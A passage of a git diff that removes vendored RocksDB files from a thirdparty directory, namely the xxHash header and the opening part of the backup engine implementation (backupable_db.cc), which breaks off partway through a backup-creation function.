diff --git a/thirdparty/rocksdb/util/xxhash.h b/thirdparty/rocksdb/util/xxhash.h
deleted file mode 100644
index 3343e34..0000000
--- a/thirdparty/rocksdb/util/xxhash.h
+++ /dev/null
@@ -1,164 +0,0 @@
-/*
-   xxHash - Fast Hash algorithm
-   Header File
-   Copyright (C) 2012-2014, Yann Collet.
-   BSD 2-Clause License (http://www.opensource.org/licenses/bsd-license.php)
-
-   Redistribution and use in source and binary forms, with or without
-   modification, are permitted provided that the following conditions are
-   met:
-
-       * Redistributions of source code must retain the above copyright
-   notice, this list of conditions and the following disclaimer.
-       * Redistributions in binary form must reproduce the above
-   copyright notice, this list of conditions and the following disclaimer
-   in the documentation and/or other materials provided with the
-   distribution.
-
-   THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-   "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-   LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-   A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-   OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-   SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-   LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-   DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-   THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-   (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-   OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-   You can contact the author at :
-   - xxHash source repository : http://code.google.com/p/xxhash/
-*/
-
-/* Notice extracted from xxHash homepage :
-
-xxHash is an extremely fast Hash algorithm, running at RAM speed limits.
-It also successfully passes all tests from the SMHasher suite.
-
-Comparison (single thread, Windows Seven 32 bits, using SMHasher on a Core 2 Duo @3GHz)
-
-Name            Speed       Q.Score   Author
-xxHash          5.4 GB/s     10
-CrapWow         3.2 GB/s      2       Andrew
-MumurHash 3a    2.7 GB/s     10       Austin Appleby
-SpookyHash      2.0 GB/s     10       Bob Jenkins
-SBox            1.4 GB/s      9       Bret Mulvey
-Lookup3         1.2 GB/s      9       Bob Jenkins
-SuperFastHash   1.2 GB/s      1       Paul Hsieh
-CityHash64      1.05 GB/s    10       Pike & Alakuijala
-FNV             0.55 GB/s     5       Fowler, Noll, Vo
-CRC32           0.43 GB/s     9
-MD5-32          0.33 GB/s    10       Ronald L. Rivest
-SHA1-32         0.28 GB/s    10
-
-Q.Score is a measure of quality of the hash function.
-It depends on successfully passing SMHasher test set.
-10 is a perfect score.
-*/
-
-#pragma once
-
-#if defined (__cplusplus)
-namespace rocksdb {
-#endif
-
-
-//****************************
-// Type
-//****************************
-typedef enum { XXH_OK=0, XXH_ERROR } XXH_errorcode;
-
-
-
-//****************************
-// Simple Hash Functions
-//****************************
-
-unsigned int XXH32 (const void* input, int len, unsigned int seed);
-
-/*
-XXH32() :
-    Calculate the 32-bits hash of sequence of length "len" stored at memory address "input".
-    The memory between input & input+len must be valid (allocated and read-accessible).
-    "seed" can be used to alter the result predictably.
-    This function successfully passes all SMHasher tests.
-    Speed on Core 2 Duo @ 3 GHz (single thread, SMHasher benchmark) : 5.4 GB/s
-    Note that "len" is type "int", which means it is limited to 2^31-1.
-    If your data is larger, use the advanced functions below.
-*/
-
-
-
-//****************************
-// Advanced Hash Functions
-//****************************
-
-void*         XXH32_init   (unsigned int seed);
-XXH_errorcode XXH32_update (void* state, const void* input, int len);
-unsigned int  XXH32_digest (void* state);
-
-/*
-These functions calculate the xxhash of an input provided in several small packets,
-as opposed to an input provided as a single block.
-
-It must be started with :
-void* XXH32_init()
-The function returns a pointer which holds the state of calculation.
-
-This pointer must be provided as "void* state" parameter for XXH32_update().
-XXH32_update() can be called as many times as necessary.
-The user must provide a valid (allocated) input.
-The function returns an error code, with 0 meaning OK, and any other value meaning there is an error.
-Note that "len" is type "int", which means it is limited to 2^31-1.
-If your data is larger, it is recommended to chunk your data into blocks
-of size for example 2^30 (1GB) to avoid any "int" overflow issue.
-
-Finally, you can end the calculation anytime, by using XXH32_digest().
-This function returns the final 32-bits hash.
-You must provide the same "void* state" parameter created by XXH32_init().
-Memory will be freed by XXH32_digest().
-*/
-
-
-int           XXH32_sizeofState();
-XXH_errorcode XXH32_resetState(void* state, unsigned int seed);
-
-#define       XXH32_SIZEOFSTATE 48
-typedef struct { long long ll[(XXH32_SIZEOFSTATE+(sizeof(long long)-1))/sizeof(long long)]; } XXH32_stateSpace_t;
-/*
-These functions allow user application to make its own allocation for state.
-
-XXH32_sizeofState() is used to know how much space must be allocated for the xxHash 32-bits state.
-Note that the state must be aligned to access 'long long' fields. Memory must be allocated and referenced by a pointer.
-This pointer must then be provided as 'state' into XXH32_resetState(), which initializes the state.
-
-For static allocation purposes (such as allocation on stack, or freestanding systems without malloc()),
-use the structure XXH32_stateSpace_t, which will ensure that memory space is large enough and correctly aligned to access 'long long' fields.
-*/
-
-
-unsigned int XXH32_intermediateDigest (void* state);
-/*
-This function does the same as XXH32_digest(), generating a 32-bit hash,
-but preserve memory context.
-This way, it becomes possible to generate intermediate hashes, and then continue feeding data with XXH32_update().
-To free memory context, use XXH32_digest(), or free().
-*/
-
-
-
-//****************************
-// Deprecated function names
-//****************************
-// The following translations are provided to ease code transition
-// You are encouraged to no longer this function names
-#define XXH32_feed   XXH32_update
-#define XXH32_result XXH32_digest
-#define XXH32_getIntermediateResult XXH32_intermediateDigest
-
-
-
-#if defined (__cplusplus)
-}  // namespace rocksdb
-#endif
diff --git a/thirdparty/rocksdb/utilities/backupable/backupable_db.cc b/thirdparty/rocksdb/utilities/backupable/backupable_db.cc
deleted file mode 100644
index 8921309..0000000
--- a/thirdparty/rocksdb/utilities/backupable/backupable_db.cc
+++ /dev/null
@@ -1,1789 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/backupable_db.h"
-#include "port/port.h"
-#include "rocksdb/rate_limiter.h"
-#include "rocksdb/transaction_log.h"
-#include "util/channel.h"
-#include "util/coding.h"
-#include "util/crc32c.h"
-#include "util/file_reader_writer.h"
-#include "util/filename.h"
-#include "util/logging.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "utilities/checkpoint/checkpoint_impl.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif  // __STDC_FORMAT_MACROS
-
-#include <inttypes.h>
-#include <stdlib.h>
-#include <algorithm>
-#include <atomic>
-#include <functional>
-#include <future>
-#include <limits>
-#include <map>
-#include <mutex>
-#include <sstream>
-#include <string>
-#include <thread>
-#include <unordered_map>
-#include <unordered_set>
-#include <vector>
-
-namespace rocksdb {
-
-void BackupStatistics::IncrementNumberSuccessBackup() {
-  number_success_backup++;
-}
-void BackupStatistics::IncrementNumberFailBackup() {
-  number_fail_backup++;
-}
-
-uint32_t BackupStatistics::GetNumberSuccessBackup() const {
-  return number_success_backup;
-}
-uint32_t BackupStatistics::GetNumberFailBackup() const {
-  return number_fail_backup;
-}
-
-std::string BackupStatistics::ToString() const {
-  char result[50];
-  snprintf(result, sizeof(result), "# success backup: %u, # fail backup: %u",
-           GetNumberSuccessBackup(), GetNumberFailBackup());
-  return result;
-}
-
-void BackupableDBOptions::Dump(Logger* logger) const {
-  ROCKS_LOG_INFO(logger, "               Options.backup_dir: %s",
-                 backup_dir.c_str());
-  ROCKS_LOG_INFO(logger, "               Options.backup_env: %p", backup_env);
-  ROCKS_LOG_INFO(logger, "        Options.share_table_files: %d",
-                 static_cast<int>(share_table_files));
-  ROCKS_LOG_INFO(logger, "                 Options.info_log: %p", info_log);
-  ROCKS_LOG_INFO(logger, "                     Options.sync: %d",
-                 static_cast<int>(sync));
-  ROCKS_LOG_INFO(logger, "         Options.destroy_old_data: %d",
-                 static_cast<int>(destroy_old_data));
-  ROCKS_LOG_INFO(logger, "         Options.backup_log_files: %d",
-                 static_cast<int>(backup_log_files));
-  ROCKS_LOG_INFO(logger, "        Options.backup_rate_limit: %" PRIu64,
-                 backup_rate_limit);
-  ROCKS_LOG_INFO(logger, "       Options.restore_rate_limit: %" PRIu64,
-                 restore_rate_limit);
-  ROCKS_LOG_INFO(logger, "Options.max_background_operations: %d",
-                 max_background_operations);
-}
-
-// -------- BackupEngineImpl class ---------
-class BackupEngineImpl : public BackupEngine {
- public:
-  BackupEngineImpl(Env* db_env, const BackupableDBOptions& options,
-                   bool read_only = false);
-  ~BackupEngineImpl();
-  Status CreateNewBackupWithMetadata(DB* db, const std::string& app_metadata,
-                                     bool flush_before_backup = false,
-                                     std::function<void()> progress_callback =
-                                         []() {}) override;
-  Status PurgeOldBackups(uint32_t num_backups_to_keep) override;
-  Status DeleteBackup(BackupID backup_id) override;
-  void StopBackup() override {
-    stop_backup_.store(true, std::memory_order_release);
-  }
-  Status GarbageCollect() override;
-
-  // The returned BackupInfos are in chronological order, which means the
-  // latest backup comes last.
-  void GetBackupInfo(std::vector<BackupInfo>* backup_info) override;
-  void GetCorruptedBackups(std::vector<BackupID>* corrupt_backup_ids) override;
-  Status RestoreDBFromBackup(
-      BackupID backup_id, const std::string& db_dir, const std::string& wal_dir,
-      const RestoreOptions& restore_options = RestoreOptions()) override;
-  Status RestoreDBFromLatestBackup(
-      const std::string& db_dir, const std::string& wal_dir,
-      const RestoreOptions& restore_options = RestoreOptions()) override {
-    return RestoreDBFromBackup(latest_backup_id_, db_dir, wal_dir,
-                               restore_options);
-  }
-
-  virtual Status VerifyBackup(BackupID backup_id) override;
-
-  Status Initialize();
-
- private:
-  void DeleteChildren(const std::string& dir, uint32_t file_type_filter = 0);
-
-  // Extends the "result" map with pathname->size mappings for the contents of
-  // "dir" in "env". Pathnames are prefixed with "dir".
-  Status InsertPathnameToSizeBytes(
-      const std::string& dir, Env* env,
-      std::unordered_map<std::string, uint64_t>* result);
-
-  struct FileInfo {
-    FileInfo(const std::string& fname, uint64_t sz, uint32_t checksum)
-      : refs(0), filename(fname), size(sz), checksum_value(checksum) {}
-
-    FileInfo(const FileInfo&) = delete;
-    FileInfo& operator=(const FileInfo&) = delete;
-
-    int refs;
-    const std::string filename;
-    const uint64_t size;
-    const uint32_t checksum_value;
-  };
-
-  class BackupMeta {
-   public:
-    BackupMeta(const std::string& meta_filename,
-        std::unordered_map<std::string, std::shared_ptr<FileInfo>>* file_infos,
-        Env* env)
-      : timestamp_(0), size_(0), meta_filename_(meta_filename),
-        file_infos_(file_infos), env_(env) {}
-
-    BackupMeta(const BackupMeta&) = delete;
-    BackupMeta& operator=(const BackupMeta&) = delete;
-
-    ~BackupMeta() {}
-
-    void RecordTimestamp() {
-      env_->GetCurrentTime(&timestamp_);
-    }
-    int64_t GetTimestamp() const {
-      return timestamp_;
-    }
-    uint64_t GetSize() const {
-      return size_;
-    }
-    uint32_t GetNumberFiles() { return static_cast<uint32_t>(files_.size()); }
-    void SetSequenceNumber(uint64_t sequence_number) {
-      sequence_number_ = sequence_number;
-    }
-    uint64_t GetSequenceNumber() {
-      return sequence_number_;
-    }
-
-    const std::string& GetAppMetadata() const { return app_metadata_; }
-
-    void SetAppMetadata(const std::string& app_metadata) {
-      app_metadata_ = app_metadata;
-    }
-
-    Status AddFile(std::shared_ptr<FileInfo> file_info);
-
-    Status Delete(bool delete_meta = true);
-
-    bool Empty() {
-      return files_.empty();
-    }
-
-    std::shared_ptr<FileInfo> GetFile(const std::string& filename) const {
-      auto it = file_infos_->find(filename);
-      if (it == file_infos_->end())
-        return nullptr;
-      return it->second;
-    }
-
-    const std::vector<std::shared_ptr<FileInfo>>& GetFiles() {
-      return files_;
-    }
-
-    // @param abs_path_to_size Pre-fetched file sizes (bytes).
-    Status LoadFromFile(
-        const std::string& backup_dir,
-        const std::unordered_map<std::string, uint64_t>& abs_path_to_size);
-    Status StoreToFile(bool sync);
-
-    std::string GetInfoString() {
-      std::ostringstream ss;
-      ss << "Timestamp: " << timestamp_ << std::endl;
-      char human_size[16];
-      AppendHumanBytes(size_, human_size, sizeof(human_size));
-      ss << "Size: " << human_size << std::endl;
-      ss << "Files:" << std::endl;
-      for (const auto& file : files_) {
-        AppendHumanBytes(file->size, human_size, sizeof(human_size));
-        ss << file->filename << ", size " << human_size << ", refs "
-           << file->refs << std::endl;
-      }
-      return ss.str();
-    }
-
-   private:
-    int64_t timestamp_;
-    // sequence number is only approximate, should not be used
-    // by clients
-    uint64_t sequence_number_;
-    uint64_t size_;
-    std::string app_metadata_;
-    std::string const meta_filename_;
-    // files with relative paths (without "/" prefix!!)
-    std::vector<std::shared_ptr<FileInfo>> files_;
-    std::unordered_map<std::string, std::shared_ptr<FileInfo>>* file_infos_;
-    Env* env_;
-
-    static const size_t max_backup_meta_file_size_ = 10 * 1024 * 1024;  // 10MB
-  };  // BackupMeta
-
-  inline std::string GetAbsolutePath(
-      const std::string &relative_path = "") const {
-    assert(relative_path.size() == 0 || relative_path[0] != '/');
-    return options_.backup_dir + "/" + relative_path;
-  }
-  inline std::string GetPrivateDirRel() const {
-    return "private";
-  }
-  inline std::string GetSharedChecksumDirRel() const {
-    return "shared_checksum";
-  }
-  inline std::string GetPrivateFileRel(BackupID backup_id,
-                                       bool tmp = false,
-                                       const std::string& file = "") const {
-    assert(file.size() == 0 || file[0] != '/');
-    return GetPrivateDirRel() + "/" + rocksdb::ToString(backup_id) +
-           (tmp ? ".tmp" : "") + "/" + file;
-  }
-  inline std::string GetSharedFileRel(const std::string& file = "",
-                                      bool tmp = false) const {
-    assert(file.size() == 0 || file[0] != '/');
-    return "shared/" + file + (tmp ? ".tmp" : "");
-  }
-  inline std::string GetSharedFileWithChecksumRel(const std::string& file = "",
-                                                  bool tmp = false) const {
-    assert(file.size() == 0 || file[0] != '/');
-    return GetSharedChecksumDirRel() + "/" + file + (tmp ? ".tmp" : "");
-  }
-  inline std::string GetSharedFileWithChecksum(const std::string& file,
-                                               const uint32_t checksum_value,
-                                               const uint64_t file_size) const {
-    assert(file.size() == 0 || file[0] != '/');
-    std::string file_copy = file;
-    return file_copy.insert(file_copy.find_last_of('.'),
-                            "_" + rocksdb::ToString(checksum_value) + "_" +
-                                rocksdb::ToString(file_size));
-  }
-  inline std::string GetFileFromChecksumFile(const std::string& file) const {
-    assert(file.size() == 0 || file[0] != '/');
-    std::string file_copy = file;
-    size_t first_underscore = file_copy.find_first_of('_');
-    return file_copy.erase(first_underscore,
-                           file_copy.find_last_of('.') - first_underscore);
-  }
-  inline std::string GetBackupMetaDir() const {
-    return GetAbsolutePath("meta");
-  }
-  inline std::string GetBackupMetaFile(BackupID backup_id) const {
-    return GetBackupMetaDir() + "/" + rocksdb::ToString(backup_id);
-  }
-
-  // If size_limit == 0, there is no size limit, copy everything.
-  //
-  // Exactly one of src and contents must be non-empty.
-  //
-  // @param src If non-empty, the file is copied from this pathname.
-  // @param contents If non-empty, the file will be created with these contents.
-  Status CopyOrCreateFile(const std::string& src, const std::string& dst,
-                          const std::string& contents, Env* src_env,
-                          Env* dst_env, bool sync, RateLimiter* rate_limiter,
-                          uint64_t* size = nullptr,
-                          uint32_t* checksum_value = nullptr,
-                          uint64_t size_limit = 0,
-                          std::function<void()> progress_callback = []() {});
-
-  Status CalculateChecksum(const std::string& src,
-                           Env* src_env,
-                           uint64_t size_limit,
-                           uint32_t* checksum_value);
-
-  struct CopyOrCreateResult {
-    uint64_t size;
-    uint32_t checksum_value;
-    Status status;
-  };
-
-  // Exactly one of src_path and contents must be non-empty. If src_path is
-  // non-empty, the file is copied from this pathname. Otherwise, if contents is
-  // non-empty, the file will be created at dst_path with these contents.
-  struct CopyOrCreateWorkItem {
-    std::string src_path;
-    std::string dst_path;
-    std::string contents;
-    Env* src_env;
-    Env* dst_env;
-    bool sync;
-    RateLimiter* rate_limiter;
-    uint64_t size_limit;
-    std::promise<CopyOrCreateResult> result;
-    std::function<void()> progress_callback;
-
-    CopyOrCreateWorkItem() {}
-    CopyOrCreateWorkItem(const CopyOrCreateWorkItem&) = delete;
-    CopyOrCreateWorkItem& operator=(const CopyOrCreateWorkItem&) = delete;
-
-    CopyOrCreateWorkItem(CopyOrCreateWorkItem&& o) ROCKSDB_NOEXCEPT {
-      *this = std::move(o);
-    }
-
-    CopyOrCreateWorkItem& operator=(CopyOrCreateWorkItem&& o) ROCKSDB_NOEXCEPT {
-      src_path = std::move(o.src_path);
-      dst_path = std::move(o.dst_path);
-      contents = std::move(o.contents);
-      src_env = o.src_env;
-      dst_env = o.dst_env;
-      sync = o.sync;
-      rate_limiter = o.rate_limiter;
-      size_limit = o.size_limit;
-      result = std::move(o.result);
-      progress_callback = std::move(o.progress_callback);
-      return *this;
-    }
-
-    CopyOrCreateWorkItem(std::string _src_path, std::string _dst_path,
-                         std::string _contents, Env* _src_env, Env* _dst_env,
-                         bool _sync, RateLimiter* _rate_limiter,
-                         uint64_t _size_limit,
-                         std::function<void()> _progress_callback = []() {})
-        : src_path(std::move(_src_path)),
-          dst_path(std::move(_dst_path)),
-          contents(std::move(_contents)),
-          src_env(_src_env),
-          dst_env(_dst_env),
-          sync(_sync),
-          rate_limiter(_rate_limiter),
-          size_limit(_size_limit),
-          progress_callback(_progress_callback) {}
-  };
-
-  struct BackupAfterCopyOrCreateWorkItem {
-    std::future<CopyOrCreateResult> result;
-    bool shared;
-    bool needed_to_copy;
-    Env* backup_env;
-    std::string dst_path_tmp;
-    std::string dst_path;
-    std::string dst_relative;
-    BackupAfterCopyOrCreateWorkItem() {}
-
-    BackupAfterCopyOrCreateWorkItem(BackupAfterCopyOrCreateWorkItem&& o)
-        ROCKSDB_NOEXCEPT {
-      *this = std::move(o);
-    }
-
-    BackupAfterCopyOrCreateWorkItem& operator=(
-        BackupAfterCopyOrCreateWorkItem&& o) ROCKSDB_NOEXCEPT {
-      result = std::move(o.result);
-      shared = o.shared;
-      needed_to_copy = o.needed_to_copy;
-      backup_env = o.backup_env;
-      dst_path_tmp = std::move(o.dst_path_tmp);
-      dst_path = std::move(o.dst_path);
-      dst_relative = std::move(o.dst_relative);
-      return *this;
-    }
-
-    BackupAfterCopyOrCreateWorkItem(std::future<CopyOrCreateResult>&& _result,
-                                    bool _shared, bool _needed_to_copy,
-                                    Env* _backup_env, std::string _dst_path_tmp,
-                                    std::string _dst_path,
-                                    std::string _dst_relative)
-        : result(std::move(_result)),
-          shared(_shared),
-          needed_to_copy(_needed_to_copy),
-          backup_env(_backup_env),
-          dst_path_tmp(std::move(_dst_path_tmp)),
-          dst_path(std::move(_dst_path)),
-          dst_relative(std::move(_dst_relative)) {}
-  };
-
-  struct RestoreAfterCopyOrCreateWorkItem {
-    std::future<CopyOrCreateResult> result;
-    uint32_t checksum_value;
-    RestoreAfterCopyOrCreateWorkItem() {}
-    RestoreAfterCopyOrCreateWorkItem(std::future<CopyOrCreateResult>&& _result,
-                                     uint32_t _checksum_value)
-        : result(std::move(_result)), checksum_value(_checksum_value) {}
-    RestoreAfterCopyOrCreateWorkItem(RestoreAfterCopyOrCreateWorkItem&& o)
-        ROCKSDB_NOEXCEPT {
-      *this = std::move(o);
-    }
-
-    RestoreAfterCopyOrCreateWorkItem& operator=(
-        RestoreAfterCopyOrCreateWorkItem&& o) ROCKSDB_NOEXCEPT {
-      result = std::move(o.result);
-      checksum_value = o.checksum_value;
-      return *this;
-    }
-  };
-
-  bool initialized_;
-  std::mutex byte_report_mutex_;
-  channel<CopyOrCreateWorkItem> files_to_copy_or_create_;
-  std::vector<port::Thread> threads_;
-
-  // Adds a file to the backup work queue to be copied or created if it doesn't
-  // already exist.
-  //
-  // Exactly one of src_dir and contents must be non-empty.
-  //
-  // @param src_dir If non-empty, the file in this directory named fname will be
-  //    copied.
-  // @param fname Name of destination file and, in case of copy, source file.
-  // @param contents If non-empty, the file will be created with these contents.
-  Status AddBackupFileWorkItem(
-      std::unordered_set<std::string>& live_dst_paths,
-      std::vector<BackupAfterCopyOrCreateWorkItem>& backup_items_to_finish,
-      BackupID backup_id, bool shared, const std::string& src_dir,
-      const std::string& fname,  // starts with "/"
-      RateLimiter* rate_limiter, uint64_t size_bytes, uint64_t size_limit = 0,
-      bool shared_checksum = false,
-      std::function<void()> progress_callback = []() {},
-      const std::string& contents = std::string());
-
-  // backup state data
-  BackupID latest_backup_id_;
-  std::map<BackupID, unique_ptr<BackupMeta>> backups_;
-  std::map<BackupID,
-           std::pair<Status, unique_ptr<BackupMeta>>> corrupt_backups_;
-  std::unordered_map<std::string,
-                     std::shared_ptr<FileInfo>> backuped_file_infos_;
-  std::atomic<bool> stop_backup_;
-
-  // options data
-  BackupableDBOptions options_;
-  Env* db_env_;
-  Env* backup_env_;
-
-  // directories
-  unique_ptr<Directory> backup_directory_;
-  unique_ptr<Directory> shared_directory_;
-  unique_ptr<Directory> meta_directory_;
-  unique_ptr<Directory> private_directory_;
-
-  static const size_t kDefaultCopyFileBufferSize = 5 * 1024 * 1024LL;  // 5MB
-  size_t copy_file_buffer_size_;
-  bool read_only_;
-  BackupStatistics backup_statistics_;
-  static const size_t kMaxAppMetaSize = 1024 * 1024;  // 1MB
-};
-
-Status BackupEngine::Open(Env* env, const BackupableDBOptions& options,
-                          BackupEngine** backup_engine_ptr) {
-  std::unique_ptr<BackupEngineImpl> backup_engine(
-      new BackupEngineImpl(env, options));
-  auto s = backup_engine->Initialize();
-  if (!s.ok()) {
-    *backup_engine_ptr = nullptr;
-    return s;
-  }
-  *backup_engine_ptr = backup_engine.release();
-  return Status::OK();
-}
-
-BackupEngineImpl::BackupEngineImpl(Env* db_env,
-                                   const BackupableDBOptions& options,
-                                   bool read_only)
-    : initialized_(false),
-      stop_backup_(false),
-      options_(options),
-      db_env_(db_env),
-      backup_env_(options.backup_env != nullptr ? options.backup_env : db_env_),
-      copy_file_buffer_size_(kDefaultCopyFileBufferSize),
-      read_only_(read_only) {
-  if (options_.backup_rate_limiter == nullptr &&
-      options_.backup_rate_limit > 0) {
-    options_.backup_rate_limiter.reset(
-        NewGenericRateLimiter(options_.backup_rate_limit));
-  }
-  if (options_.restore_rate_limiter == nullptr &&
-      options_.restore_rate_limit > 0) {
-    options_.restore_rate_limiter.reset(
-        NewGenericRateLimiter(options_.restore_rate_limit));
-  }
-}
-
-BackupEngineImpl::~BackupEngineImpl() {
-  files_to_copy_or_create_.sendEof();
-  for (auto& t : threads_) {
-    t.join();
-  }
-  LogFlush(options_.info_log);
-}
-
-Status BackupEngineImpl::Initialize() {
-  assert(!initialized_);
-  initialized_ = true;
-  if (read_only_) {
-    ROCKS_LOG_INFO(options_.info_log, "Starting read_only backup engine");
-  }
-  options_.Dump(options_.info_log);
-
-  if (!read_only_) {
-    // gather the list of directories that we need to create
-    std::vector<std::pair<std::string, std::unique_ptr<Directory>*>>
-        directories;
-    directories.emplace_back(GetAbsolutePath(), &backup_directory_);
-    if (options_.share_table_files) {
-      if (options_.share_files_with_checksum) {
-        directories.emplace_back(
-            GetAbsolutePath(GetSharedFileWithChecksumRel()),
-            &shared_directory_);
-      } else {
-        directories.emplace_back(GetAbsolutePath(GetSharedFileRel()),
-                                 &shared_directory_);
-      }
-    }
-    directories.emplace_back(GetAbsolutePath(GetPrivateDirRel()),
-                             &private_directory_);
-    directories.emplace_back(GetBackupMetaDir(), &meta_directory_);
-    // create all the dirs we need
-    for (const auto& d : directories) {
-      auto s = backup_env_->CreateDirIfMissing(d.first);
-      if (s.ok()) {
-        s = backup_env_->NewDirectory(d.first, d.second);
-      }
-      if (!s.ok()) {
-        return s;
-      }
-    }
-  }
-
-  std::vector<std::string> backup_meta_files;
-  {
-    auto s = backup_env_->GetChildren(GetBackupMetaDir(), &backup_meta_files);
-    if (s.IsNotFound()) {
-      return Status::NotFound(GetBackupMetaDir() + " is missing");
-    } else if (!s.ok()) {
-      return s;
-    }
-  }
-  // create backups_ structure
-  for (auto& file : backup_meta_files) {
-    if (file == "." || file == "..") {
-      continue;
-    }
-    ROCKS_LOG_INFO(options_.info_log, "Detected backup %s", file.c_str());
-    BackupID backup_id = 0;
-    sscanf(file.c_str(), "%u", &backup_id);
-    if (backup_id == 0 || file != rocksdb::ToString(backup_id)) {
-      if (!read_only_) {
-        // invalid file name, delete that
-        auto s = backup_env_->DeleteFile(GetBackupMetaDir() + "/" + file);
-        ROCKS_LOG_INFO(options_.info_log,
-                       "Unrecognized meta file %s, deleting -- %s",
-                       file.c_str(), s.ToString().c_str());
-      }
-      continue;
-    }
-    assert(backups_.find(backup_id) == backups_.end());
-    backups_.insert(
-        std::make_pair(backup_id, unique_ptr<BackupMeta>(new BackupMeta(
-                                      GetBackupMetaFile(backup_id),
-                                      &backuped_file_infos_, backup_env_))));
-  }
-
-  latest_backup_id_ = 0;
-  if (options_.destroy_old_data) {  // Destroy old data
-    assert(!read_only_);
-    ROCKS_LOG_INFO(
-        options_.info_log,
-        "Backup Engine started with destroy_old_data == true, deleting all "
-        "backups");
-    auto s = PurgeOldBackups(0);
-    if (s.ok()) {
-      s = GarbageCollect();
-    }
-    if (!s.ok()) {
-      return s;
-    }
-  } else {  // Load data from storage
-    std::unordered_map<std::string, uint64_t> abs_path_to_size;
-    for (const auto& rel_dir :
-         {GetSharedFileRel(), GetSharedFileWithChecksumRel()}) {
-      const auto abs_dir = GetAbsolutePath(rel_dir);
-      InsertPathnameToSizeBytes(abs_dir, backup_env_, &abs_path_to_size);
-    }
-    // load the backups if any, until valid_backups_to_open of the latest
-    // non-corrupted backups have been successfully opened.
-    int valid_backups_to_open;
-    if (options_.max_valid_backups_to_open == 0) {
-      valid_backups_to_open = INT_MAX;
-    } else {
-      valid_backups_to_open = options_.max_valid_backups_to_open;
-    }
-    for (auto backup_iter = backups_.rbegin();
-         backup_iter != backups_.rend() && valid_backups_to_open > 0;
-         ++backup_iter) {
-      InsertPathnameToSizeBytes(
-          GetAbsolutePath(GetPrivateFileRel(backup_iter->first)), backup_env_,
-          &abs_path_to_size);
-      Status s = backup_iter->second->LoadFromFile(options_.backup_dir,
-                                                   abs_path_to_size);
-      if (s.IsCorruption()) {
-        ROCKS_LOG_INFO(options_.info_log, "Backup %u corrupted -- %s",
-                       backup_iter->first, s.ToString().c_str());
-        corrupt_backups_.insert(
-            std::make_pair(backup_iter->first,
-                           std::make_pair(s, std::move(backup_iter->second))));
-      } else if (!s.ok()) {
-        // Distinguish corruption errors from errors in the backup Env.
-        // Errors in the backup Env (i.e., this code path) will cause Open() to
-        // fail, whereas corruption errors would not cause Open() failures.
-        return s;
-      } else {
-        ROCKS_LOG_INFO(options_.info_log, "Loading backup %" PRIu32 " OK:\n%s",
-                       backup_iter->first,
-                       backup_iter->second->GetInfoString().c_str());
-        latest_backup_id_ = std::max(latest_backup_id_, backup_iter->first);
-        --valid_backups_to_open;
-      }
-    }
-
-    for (const auto& corrupt : corrupt_backups_) {
-      backups_.erase(backups_.find(corrupt.first));
-    }
-    // erase the backups before max_valid_backups_to_open
-    int num_unopened_backups;
-    if (options_.max_valid_backups_to_open == 0) {
-      num_unopened_backups = 0;
-    } else {
-      num_unopened_backups =
-          std::max(0, static_cast<int>(backups_.size()) -
-                          options_.max_valid_backups_to_open);
-    }
-    for (int i = 0; i < num_unopened_backups; ++i) {
-      assert(backups_.begin()->second->Empty());
-      backups_.erase(backups_.begin());
-    }
-  }
-
-  ROCKS_LOG_INFO(options_.info_log, "Latest backup is %u", latest_backup_id_);
-
-  // set up threads perform copies from files_to_copy_or_create_ in the
-  // background
-  for (int t = 0; t < options_.max_background_operations; t++) {
-    threads_.emplace_back([this]() {
-#if defined(_GNU_SOURCE) && defined(__GLIBC_PREREQ)
-#if __GLIBC_PREREQ(2, 12)
-      pthread_setname_np(pthread_self(), "backup_engine");
-#endif
-#endif
-      CopyOrCreateWorkItem work_item;
-      while (files_to_copy_or_create_.read(work_item)) {
-        CopyOrCreateResult result;
-        result.status = CopyOrCreateFile(
-            work_item.src_path, work_item.dst_path, work_item.contents,
-            work_item.src_env, work_item.dst_env, work_item.sync,
-            work_item.rate_limiter, &result.size, &result.checksum_value,
-            work_item.size_limit, work_item.progress_callback);
-        work_item.result.set_value(std::move(result));
-      }
-    });
-  }
-  ROCKS_LOG_INFO(options_.info_log, "Initialized BackupEngine");
-
-  return Status::OK();
-}
-
-Status BackupEngineImpl::CreateNewBackupWithMetadata(
-    DB* db, const std::string& app_metadata, bool flush_before_backup,
-    std::function<void()> progress_callback) {
-  assert(initialized_);
-  assert(!read_only_);
-  if (app_metadata.size() > kMaxAppMetaSize) {
-    return Status::InvalidArgument("App metadata too large");
-  }
-
-  BackupID new_backup_id = latest_backup_id_ + 1;
-
-  assert(backups_.find(new_backup_id) == backups_.end());
-  auto ret = backups_.insert(
-      std::make_pair(new_backup_id, unique_ptr<BackupMeta>(new BackupMeta(
-                                        GetBackupMetaFile(new_backup_id),
-                                        &backuped_file_infos_, backup_env_))));
-  assert(ret.second == true);
-  auto& new_backup = ret.first->second;
-  new_backup->RecordTimestamp();
-  new_backup->SetAppMetadata(app_metadata);
-
-  auto start_backup = backup_env_-> NowMicros();
-
